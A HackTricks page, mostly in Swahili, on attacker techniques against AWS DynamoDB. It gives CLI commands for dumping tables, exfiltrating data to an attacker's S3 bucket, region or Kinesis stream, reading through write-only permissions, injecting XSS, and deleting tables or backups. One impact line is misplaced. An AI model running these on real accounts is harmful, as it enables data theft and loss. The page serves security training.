AWS - DynamoDB Post Exploitation

Reading time: 18 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

DynamoDB

Kwa taarifa zaidi angalia:

AWS - DynamoDB Enum

Mshambuliaji mwenye ruhusa hizi ataweza kupata vitu kutoka katika jedwali kwa kutumia ufunguo mkuu (huwezi kuomba tu data yote ya jedwali). Hii inamaanisha kuwa unahitaji kujua funguo kuu (unaweza kupata hizi kwa kupata metadata ya jedwali (describe-table).

bash

aws dynamodb batch-get-item --request-items file:///tmp/a.json

// With a.json
{
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
}

bash

aws dynamodb batch-get-item \
--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
--region <region>

Athari Inayoweza Kutokea: privesc isiyo ya moja kwa moja kwa kupata taarifa nyeti kwenye jedwali

`dynamodb:GetItem`

Sawa na ruhusa zilizotangulia hii inamruhusu mdukuzi anayeweza kusoma thamani kutoka jedwali 1 tu kwa kupewa primary key ya rekodi inayotakiwa:

json

aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json

// With a.json
{
"Id" : {
"N": "205"
}
}

Kwa ruhusa hii pia inawezekana kutumia njia ya transact-get-items kama:

json

aws dynamodb transact-get-items \
--transact-items file:///tmp/a.json

// With a.json
[
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
]

Athari Inayowezekana: Indirect privesc kwa kutambua taarifa nyeti kwenye jedwali

`dynamodb:Query`

Sawa na ruhusa zilizotangulia hii inamruhusu mshambuliaji kusoma thamani kutoka kwenye jedwali moja tu iwapo primary key ya rekodi ya kupatikana itatolewa. Inaruhusu kutumia subset of comparisons, lakini kulinganisha pekee kinachoruhusiwa na primary key (ambacho lazima kiwepo) ni "EQ", kwa hivyo huwezi kutumia kulinganisha kupata DB nzima katika ombi.

bash

aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json

// With a.json
{
"Id" : {
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
}

bash

aws dynamodb query \
--table-name TargetTable \
--key-condition-expression "AttributeName = :value" \
--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
--region <region>

Potential Impact: Isiyo ya moja kwa moja privesc kwa kutafuta taarifa nyeti kwenye jedwali

`dynamodb:Scan`

Unaweza kutumia ruhusa hii ili dump jedwali zima kwa urahisi.

bash

aws dynamodb scan --table-name <t_name> #Get data inside the table

Athari Inayowezekana: Indirect privesc kwa kupata taarifa nyeti kwenye jedwali

`dynamodb:PartiQLSelect`

Unaweza kutumia ruhusa hii ili dump jedwali lote kwa urahisi.

bash

aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"

Idhini hii pia inaruhusu kutekeleza batch-execute-statement kama:

bash

aws dynamodb batch-execute-statement \
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'

lakini unahitaji kubainisha funguo kuu na thamani, hivyo haifai sana.

Potential Impact: Indirect privesc kwa kupata taarifa nyeti kwenye jedwali

`dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`

Ruhusa hii itamruhusu attacker kuhamisha jedwali lote kwenye S3 bucket ya chaguo lake:

bash

aws dynamodb export-table-to-point-in-time \
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>

Kumbuka kwamba ili hili lifanye kazi, jedwali linahitaji kuwa na point-in-time-recovery imewezeshwa; unaweza kukagua ikiwa jedwali lina kwa:

bash

aws dynamodb describe-continuous-backups \
--table-name <tablename>

Ikiwa haijawezeshwa, utahitaji kuiwezesha na kwa hilo unahitaji ruhusa dynamodb:ExportTableToPointInTime:

bash

aws dynamodb update-continuous-backups \
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true

Madhara Yanayoweza Kutokea: Kuongezeka kwa mamlaka kwa njia isiyo ya moja kwa moja (indirect privesc) kwa kupata taarifa nyeti kwenye jedwali

`dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`

Kwa ruhusa hizi, mshambuliaji angeweza kutengeneza jedwali jipya kutoka kwenye backup (au hata kutengeneza backup kisha kuirejesha kwenye jedwali tofauti). Kisha, kwa ruhusa zinazohitajika, angeweza kuangalia taarifa kutoka kwa backups ambazo chazikuwa tena kwenye jedwali la production.

bash

aws dynamodb restore-table-from-backup \
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>

Athari Inayoweza Kutokea: Privesc isiyo ya moja kwa moja kwa kupata taarifa nyeti kwenye chelezo ya jedwali

`dynamodb:PutItem`

Ruhusa hii inaruhusu watumiaji kuongeza rekodi mpya kwenye jedwali au kubadilisha rekodi iliyopo kwa rekodi mpya. Ikiwa rekodi yenye funguo kuu ile ile tayari ipo, rekodi nzima itabadilishwa na rekodi mpya. Ikiwa funguo kuu haipo, rekodi mpya yenye funguo kuu iliyobainishwa itakuwa imeundwa.

bash

## Create new item with XSS payload
aws dynamodb put-item --table <table_name> --item file://add.json
### With add.json:
{
"Id": {
"S": "1000"
},
"Name": {
"S":  "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
}

bash

aws dynamodb put-item \
--table-name ExampleTable \
--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
--region <region>

Athari Inayoweza Kutokea: Kutumiwa kwa udhaifu zaidi au bypasses kwa kuwa na uwezo wa kuongeza/kuhariri data katika jedwali la DynamoDB

`dynamodb:UpdateItem`

Ruhusa hii inaruhusu watumiaji kubadilisha sifa zilizopo za item au kuongeza sifa mpya kwa item. Haitoibadilishi item yote; inasasisha tu sifa zilizotajwa. Ikiwa funguo kuu haipo katika jedwali, operesheni itaunda item mpya na funguo kuu iliyotajwa na kuweka sifa zilizotajwa katika update expression.

bash

## Update item with XSS payload
aws dynamodb update-item --table <table_name> \
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
### With key.json:
{
"Id": {
"S": "1000"
}
}
### and val.json
{
":value": {
"S": "<script>alert(1)</script>"
}
}

bash

aws dynamodb update-item \
--table-name ExampleTable \
--key '{"Id": {"S": "1"}}' \
--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
--region <region>

Athari Inayowezekana: Kutumiwa kwa udhaifu au mbinu za kuzunguka vikwazo zaidi kwa kuwa na uwezo wa kuongeza/kuhariri data katika jedwali la DynamoDB

`dynamodb:DeleteTable`

Mshambuliaji mwenye ruhusa hii anaweza kufuta jedwali la DynamoDB, kusababisha kupoteza data.

bash

aws dynamodb delete-table \
--table-name TargetTable \
--region <region>

Athari inayowezekana: Upotevu wa data na kuathirika kwa huduma zinazotegemea jedwali lililofutwa.

`dynamodb:DeleteBackup`

Mshambuliaji mwenye ruhusa hii anaweza kufuta chelezo ya DynamoDB, jambo linaloweza kusababisha upotevu wa data katika hali ya urejeshaji baada ya maafa.

bash

aws dynamodb delete-backup \
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>

Potential impact: Kupoteza data na kushindwa kurejesha kutoka kwenye backup wakati wa tukio la kupona baada ya maafa.

`dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`

note

TODO: Jaribu kama hii kweli inafanya kazi

Mtu mwenye ruhusa hizi (attacker) anaweza enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time. Hii inamruhusu attacker kufuatilia na exfiltrate mabadiliko ya data, ambayo inaweza kusababisha data leakage.

Wezesha stream kwenye DynamoDB table:

bash

aws dynamodb update-table \
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>

Elezea mtiririko ili kupata ARN na maelezo mengine:

bash

aws dynamodb describe-stream \
--table-name TargetTable \
--region <region>

Pata shard iterator ukitumia stream ARN:

bash

aws dynamodbstreams get-shard-iterator \
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>

Tumia shard iterator ili kufikia na exfiltrate data kutoka kwenye stream:

bash

aws dynamodbstreams get-records \
--shard-iterator <shard_iterator> \
--region <region>

Athari inayowezekana: Ufuatiliaji wa wakati-halisi na data leakage ya mabadiliko ya jedwali la DynamoDB.

Soma vitu kupitia `dynamodb:UpdateItem` na `ReturnValues=ALL_OLD`

Mshambuliaji mwenye tu ruhusa ya dynamodb:UpdateItem kwenye jedwali anaweza kusoma vitu bila ya ruhusa za kawaida za kusoma (GetItem/Query/Scan) kwa kufanya sasisho lisilo hatari na kuomba --return-values ALL_OLD. DynamoDB itarudisha taswira kamili ya kitu kabla ya sasisho katika uwanja wa Attributes wa jibu (hii haitumii RCUs).

Ruhusa za chini: dynamodb:UpdateItem kwenye jedwali/ufunguo lengwa.
Masharti ya awali: Unapaswa kujua ufunguo mkuu wa kipengee.

Mfano (inaongeza sifa isiyo hatari na exfiltrates kipengee cha awali katika jibu):

bash

aws dynamodb update-item \
--table-name <TargetTable> \
--key '{"<PKName>":{"S":"<PKValue>"}}' \
--update-expression 'SET #m = :v' \
--expression-attribute-names '{"#m":"exfil_marker"}' \
--expression-attribute-values '{":v":{"S":"1"}}' \
--return-values ALL_OLD \
--region <region>

Jibu la CLI litajumuisha kifungu cha Attributes kinachojumuisha item ya awali kwa ukamilifu (sifa zote), na kwa ufanisi kutoa read primitive kutoka kwa write-only access.

Athari Inayoweza Kutokea: Kusoma vitu vya aina yoyote kutoka kwenye jedwali kwa ruhusa za kuandika tu, kuruhusu sensitive data exfiltration wakati primary keys zinapojulikana.

`dynamodb:UpdateTable (replica-updates)` | `dynamodb:CreateTableReplica`

Exfiltration kimyakimya kwa kuongeza replica Region mpya kwenye DynamoDB Global Table (version 2019.11.21). Ikiwa principal anaweza kuongeza regional replica, jedwali lote linareplikishwa hadi Region iliyochaguliwa na attacker, ambapo attacker anaweza kusoma vitu vyote.

bash

# Add a new replica Region (from primary Region)
aws dynamodb update-table \
--table-name <TableName> \
--replica-updates '[{"Create": {"RegionName": "<replica-region>"}}]' \
--region <primary-region>

# Wait until the replica table becomes ACTIVE in the replica Region
aws dynamodb describe-table --table-name <TableName> --region <replica-region> --query 'Table.TableStatus'

# Exfiltrate by reading from the replica Region
aws dynamodb scan --table-name <TableName> --region <replica-region>

bash

# Specify the CMK to use in the replica Region
aws dynamodb update-table \
--table-name <TableName> \
--replica-updates '[{"Create": {"RegionName": "<replica-region>", "KMSMasterKeyId": "arn:aws:kms:<replica-region>:<account-id>:key/<cmk-id>"}}]' \
--region <primary-region>

Ruhusa: dynamodb:UpdateTable (with replica-updates) au dynamodb:CreateTableReplica kwenye jedwali lengwa. Ikiwa CMK imetumika kwenye replica, huenda ruhusa za KMS kwa key hiyo zikahitajika.

Matokeo Yanayoweza Kutokea: Kuzalisha meza nzima (full-table replication) kwenda Region inayodhibitiwa na mshambulizi, kupelekea uondoaji wa data kwa kificho.

`dynamodb:TransactWriteItems` (kusoma kupitia condition iliyoshindwa + `ReturnValuesOnConditionCheckFailure=ALL_OLD`)

Mshambulizi mwenye ruhusa za transactional write anaweza kusafirisha kwa siri sifa zote za item iliyopo kwa kufanya Update ndani ya TransactWriteItems ambayo kwa kukusudia inashindwa kwa ConditionExpression huku ikiwekwa ReturnValuesOnConditionCheckFailure=ALL_OLD. Kwa kufeli, DynamoDB hujumuisha sifa za awali katika sababu za kughairi muamala, na hivyo kubadilisha upatikanaji wa kuandika pekee kuwa upatikanaji wa kusoma wa funguo zilizolengwa.

bash

# Create the transaction input (list form for --transact-items)
cat > /tmp/tx_items.json << 'JSON'
[
{
"Update": {
"TableName": "<TableName>",
"Key": {"<PKName>": {"S": "<PKValue>"}},
"UpdateExpression": "SET #m = :v",
"ExpressionAttributeNames": {"#m": "marker"},
"ExpressionAttributeValues": {":v": {"S": "x"}},
"ConditionExpression": "attribute_not_exists(<PKName>)",
"ReturnValuesOnConditionCheckFailure": "ALL_OLD"
}
}
]
JSON

# Execute. Newer AWS CLI versions support returning cancellation reasons
aws dynamodb transact-write-items \
--transact-items file:///tmp/tx_items.json \
--region <region> \
--return-cancellation-reasons
# The command fails with TransactionCanceledException; parse cancellationReasons[0].Item

python

import boto3
c=boto3.client('dynamodb',region_name='<region>')
try:
c.transact_write_items(TransactItems=[{ 'Update': {
'TableName':'<TableName>',
'Key':{'<PKName>':{'S':'<PKValue>'}},
'UpdateExpression':'SET #m = :v',
'ExpressionAttributeNames':{'#m':'marker'},
'ExpressionAttributeValues':{':v':{'S':'x'}},
'ConditionExpression':'attribute_not_exists(<PKName>)',
'ReturnValuesOnConditionCheckFailure':'ALL_OLD'}}])
except c.exceptions.TransactionCanceledException as e:
print(e.response['CancellationReasons'][0]['Item'])

Ruhusa: dynamodb:TransactWriteItems kwenye jedwali lengwa (na item msingi). Hakuna ruhusa za kusoma zinahitajika.

Athari Inayoweza Kutokea: Soma items yoyote (kwa primary key) kutoka kwenye jedwali ukitumia tu ruhusa za transactional write kupitia cancellation reasons zinazorejeshwa.

`dynamodb:UpdateTable` + `dynamodb:UpdateItem` + `dynamodb:Query` on GSI

Pitia vikwazo vya kusoma kwa kuunda Global Secondary Index (GSI) yenye ProjectionType=ALL kwenye attribute yenye entropy ndogo, weka attribute hiyo kuwa thamani ya kudumu kwa items zote, kisha Query index ili kupata items kamili. Hii inafanya kazi hata kama Query/Scan kwenye jedwali msingi imekataliwa, mradi tu unaweza ku-query ARN ya index.

Minimum permissions:
dynamodb:UpdateTable kwenye jedwali lengwa (kutengeneza GSI yenye ProjectionType=ALL).
dynamodb:UpdateItem kwenye jedwali lengwa keys (kuweka attribute iliyowekwa kwenye index kwa kila item).
dynamodb:Query kwenye index resource ARN (arn:aws:dynamodb:<region>:<account-id>:table/<TableName>/index/<IndexName>).

Hatua (PoC in us-east-1):

bash

# 1) Create table and seed items (without the future GSI attribute)
aws dynamodb create-table --table-name HTXIdx \
--attribute-definitions AttributeName=id,AttributeType=S \
--key-schema AttributeName=id,KeyType=HASH \
--billing-mode PAY_PER_REQUEST --region us-east-1
aws dynamodb wait table-exists --table-name HTXIdx --region us-east-1
for i in 1 2 3 4 5; do \
aws dynamodb put-item --table-name HTXIdx \
--item "{\"id\":{\"S\":\"$i\"},\"secret\":{\"S\":\"sec-$i\"}}" \
--region us-east-1; done

# 2) Add GSI on attribute X with ProjectionType=ALL
aws dynamodb update-table --table-name HTXIdx \
--attribute-definitions AttributeName=X,AttributeType=S \
--global-secondary-index-updates '[{"Create":{"IndexName":"ExfilIndex","KeySchema":[{"AttributeName":"X","KeyType":"HASH"}],"Projection":{"ProjectionType":"ALL"}}}]' \
--region us-east-1
# Wait for index to become ACTIVE
aws dynamodb describe-table --table-name HTXIdx --region us-east-1 \
--query 'Table.GlobalSecondaryIndexes[?IndexName==`ExfilIndex`].IndexStatus'

# 3) Set X="dump" for each item (only UpdateItem on known keys)
for i in 1 2 3 4 5; do \
aws dynamodb update-item --table-name HTXIdx \
--key "{\"id\":{\"S\":\"$i\"}}" \
--update-expression 'SET #x = :v' \
--expression-attribute-names '{"#x":"X"}' \
--expression-attribute-values '{":v":{"S":"dump"}}' \
--region us-east-1; done

# 4) Query the index by the constant value to retrieve full items
aws dynamodb query --table-name HTXIdx --index-name ExfilIndex \
--key-condition-expression '#x = :v' \
--expression-attribute-names '{"#x":"X"}' \
--expression-attribute-values '{":v":{"S":"dump"}}' \
--region us-east-1

Athari Inayoweza Kutokea: exfiltration kamili ya jedwali kwa ku-query GSI mpya iliyoundwa ambayo inaonyesha attributes zote, hata wakati ruhusa za kusoma za base table zimekataliwa.

`dynamodb:EnableKinesisStreamingDestination` (Exfiltration endelevu kupitia Kinesis Data Streams)

Kutumia vibaya DynamoDB Kinesis streaming destinations ili kuendelea kufanya exfiltration ya mabadiliko kutoka kwenye jedwali kwenda kwenye Kinesis Data Stream inayodhibitiwa na mshambuliaji. Mara inapoamilishwa, kila tukio la INSERT/MODIFY/REMOVE linafikishwa karibu kwa real-time kwenye stream bila hitaji la ruhusa za kusoma kwenye jedwali.

Ruhusa za chini kabisa (mshambuliaji):

dynamodb:EnableKinesisStreamingDestination kwenye jedwali lengwa
Hiari: dynamodb:DescribeKinesisStreamingDestination/dynamodb:DescribeTable kwa kufuatilia hali
Ruhusa za kusoma kwenye Kinesis stream inayomilikiwa na mshambuliaji ili kusoma rekodi: kinesis:*

PoC (us-east-1)

bash

# 1) Prepare: create a table and seed one item
aws dynamodb create-table --table-name HTXKStream \
--attribute-definitions AttributeName=id,AttributeType=S \
--key-schema AttributeName=id,KeyType=HASH \
--billing-mode PAY_PER_REQUEST --region us-east-1
aws dynamodb wait table-exists --table-name HTXKStream --region us-east-1
aws dynamodb put-item --table-name HTXKStream \
--item file:///tmp/htx_item1.json --region us-east-1
# /tmp/htx_item1.json
# {"id":{"S":"a1"},"secret":{"S":"s-1"}}

# 2) Create attacker Kinesis Data Stream
aws kinesis create-stream --stream-name htx-ddb-exfil --shard-count 1 --region us-east-1
aws kinesis wait stream-exists --stream-name htx-ddb-exfil --region us-east-1

# 3) Enable the DynamoDB -> Kinesis streaming destination
STREAM_ARN=$(aws kinesis describe-stream-summary --stream-name htx-ddb-exfil \
--region us-east-1 --query StreamDescriptionSummary.StreamARN --output text)
aws dynamodb enable-kinesis-streaming-destination \
--table-name HTXKStream --stream-arn "$STREAM_ARN" --region us-east-1
# Optionally wait until ACTIVE
aws dynamodb describe-kinesis-streaming-destination --table-name HTXKStream \
--region us-east-1 --query KinesisDataStreamDestinations[0].DestinationStatus

# 4) Generate changes on the table
aws dynamodb put-item --table-name HTXKStream \
--item file:///tmp/htx_item2.json --region us-east-1
# /tmp/htx_item2.json
# {"id":{"S":"a2"},"secret":{"S":"s-2"}}
aws dynamodb update-item --table-name HTXKStream \
--key file:///tmp/htx_key_a1.json \
--update-expression "SET #i = :v" \
--expression-attribute-names {#i:info} \
--expression-attribute-values {:v:{S:updated}} \
--region us-east-1
# /tmp/htx_key_a1.json -> {"id":{"S":"a1"}}

# 5) Consume from Kinesis to observe DynamoDB images
SHARD=$(aws kinesis list-shards --stream-name htx-ddb-exfil --region us-east-1 \
--query Shards[0].ShardId --output text)
IT=$(aws kinesis get-shard-iterator --stream-name htx-ddb-exfil --shard-id "$SHARD" \
--shard-iterator-type TRIM_HORIZON --region us-east-1 --query ShardIterator --output text)
aws kinesis get-records --shard-iterator "$IT" --limit 10 --region us-east-1 > /tmp/krec.json
# Decode one record (Data is base64-encoded)
jq -r .Records[0].Data /tmp/krec.json | base64 --decode | jq .

# 6) Cleanup (recommended)
aws dynamodb disable-kinesis-streaming-destination \
--table-name HTXKStream --stream-arn "$STREAM_ARN" --region us-east-1 || true
aws kinesis delete-stream --stream-name htx-ddb-exfil --enforce-consumer-deletion --region us-east-1 || true
aws dynamodb delete-table --table-name HTXKStream --region us-east-1 || true

`dynamodb:UpdateTimeToLive`

Mshambuliaji mwenye ruhusa ya dynamodb:UpdateTimeToLive anaweza kubadilisha usanidi wa TTL (time-to-live) wa jedwali — kuwezesha au kuzima TTL. Wakati TTL itakapowezeshwa, vipengee vinavyobeba sifa ya TTL iliyowekwa vitafutwa kiotomatiki mara tu wakati wa kumalizika utakapofika. Thamani ya TTL ni sifa nyingine tu kwenye kila kipengee; vipengee bila sifa hiyo havinaathiriwa na ufutaji unaotokana na TTL.

Iwapo vipengee havija nazo sifa ya TTL, mshambuliaji atahitaji pia ruhusa zinazowaruhusu kusasisha vipengee (kwa mfano dynamodb:UpdateItem) ili kuongeza sifa ya TTL na kusababisha ufutaji wa wingi.

Kwanza wezesha TTL kwenye jedwali, ukibainisha jina la sifa litakalotumika kwa kumalizika:

bash

aws dynamodb update-time-to-live \
--table-name <TABLE_NAME> \
--time-to-live-specification "Enabled=true, AttributeName=<TTL_ATTRIBUTE_NAME>"

Kisha sasisha vitu ili kuongeza sifa ya TTL (epoch seconds) ili vitakapokwisha ziweze kuondolewa:

bash

aws dynamodb update-item \
--table-name <TABLE_NAME> \
--key '<PRIMARY_KEY_JSON>' \
--update-expression "SET <TTL_ATTRIBUTE_NAME> = :t" \
--expression-attribute-values '{":t":{"N":"<EPOCH_SECONDS_VALUE>"}}'

`dynamodb:RestoreTableFromAwsBackup` & `dynamodb:RestoreTableToPointInTime`

Mshambuliaji mwenye ruhusa za dynamodb:RestoreTableFromAwsBackup au dynamodb:RestoreTableToPointInTime anaweza kuunda meza mpya zilizorejeshwa kutoka kwa backups au kutoka kwa point-in-time recovery (PITR) bila kuandika juu ya meza ya asili. Meza iliyorejeshwa ina picha kamili ya data katika wakati ulioteuliwa, hivyo mshambuliaji anaweza kuitumia ku-exfiltrate taarifa za kihistoria au kupata dump kamili ya hali ya zamani ya hifadhidata.

Restore a DynamoDB table from an on-demand backup:

bash

aws dynamodb restore-table-from-backup \
--target-table-name <NEW_TABLE_NAME> \
--backup-arn <BACKUP_ARN>

Rudisha jedwali la DynamoDB hadi wakati maalum (tengeneza jedwali jipya lenye hali iliyorejeshwa):

bash

aws dynamodb restore-table-to-point-in-time \
--source-table-name <SOURCE_TABLE_NAME> \
--target-table-name <NEW_TABLE_NAME> \
--use-latest-restorable-time

Potential Impact: Exfiltration endelevu, karibu kwa wakati halisi, ya mabadiliko ya jedwali kwenda kwenye Kinesis stream inayodhibitiwa na mshambuliaji bila operesheni za moja kwa moja za kusoma kwenye jedwali.

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud